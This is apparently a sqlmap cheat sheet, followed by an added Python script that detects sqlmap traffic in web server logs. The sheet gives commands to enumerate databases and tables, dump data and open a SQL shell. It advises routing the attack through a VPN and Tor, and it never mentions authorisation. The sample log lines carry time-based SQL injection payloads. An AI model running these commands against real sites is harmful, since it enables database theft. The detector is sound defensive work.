SQL Injection testing and exploiting with sqlmap


Find, test, and exploit SQL injection vulnerabilities on a website.
Running sqlmap through an OpenVPN tunnel and then Tor is recommended, although time-based (blind) techniques will mostly fail because Tor's latency jitter masks the delays they rely on.

```bash
# -u URL         | the base URL to test (with the HTTP GET payload in the query string)
# --dbs          | enumerate all databases once a working injection technique is found
# --tables       | combined with -D DATABASE, enumerate all tables in that database
# --columns      | combined with -D DATABASE -T TABLE, enumerate the columns of that table
# --dump         | dump the selected data (written to CSV files in the output directory)
# -r reqfile     | load a raw HTTP request from a file as the template for the attack (used for POST requests)
# --tor          | send traffic through the Tor SOCKS5 proxy at 127.0.0.1:9050
# --check-tor    | query check.torproject.org to verify that Tor is actually being used
# --random-agent | use a random User-Agent header when testing the target
# -vN            | verbosity level; recommended: 4, need more? 5, 6 is too noisy

# examples
sqlmap -u URL --dbs --random-agent --tor --check-tor -v5
sqlmap -u URL -D [DATABASE] --tables --random-agent --tor --check-tor -v5
sqlmap -u URL -D [DATABASE] -T [TABLE] --columns --random-agent --tor --check-tor -v5
sqlmap -u URL -D [DATABASE] -T [TABLE] --dump --random-agent --tor --check-tor -v5
sqlmap -r request_headers.txt -D DATABASE --tables
```

Once an injection point has been confirmed, re-run the command with `--sql-shell` to open an interactive SQL shell against the backend database.
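The flip side for defenders: the options above leave two signals in web server logs, the default `sqlmap/` User-Agent (which `--random-agent` removes) and the time-based payloads (`SLEEP`, `BENCHMARK`, `pg_sleep`, `WAITFOR DELAY`) that the blind techniques send. This added example, not from the original note, scans combined-format access log lines for both; the log lines and the `sqlmap/1.7` User-Agent string are constructed samples, and the log format regex assumes the standard Apache/nginx combined format.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache/nginx "combined" format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /item?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /item?id=1%27%20AND%20%28SELECT%20BENCHMARK%285000000%2CMD5%281%29%29%29--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /item?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d+ \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Delay primitives used by time-based blind SQLi across MySQL, PostgreSQL and MSSQL.
TIME_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\b", re.IGNORECASE)


def classify(line):
    """Return a record with the reasons a line looks like sqlmap traffic, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # Signal 1: sqlmap's default User-Agent begins with "sqlmap/"; --random-agent suppresses it.
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("default sqlmap user-agent")
    # Signal 2: decode the path first, since payloads arrive URL-encoded (%20, %28, ...).
    if TIME_RE.search(unquote_plus(m["path"])):
        reasons.append("time-based SQLi primitive in request")
    return {"ip": m["ip"], "path": m["path"], "reasons": reasons}


def scan(log_text):
    """Return only the parsed records that carry at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ip"], h["path"], "->", "; ".join(h["reasons"]))
```

The third sample line is the realistic case: a browser-like User-Agent with a delay payload in the query, which only the decoded-payload check catches.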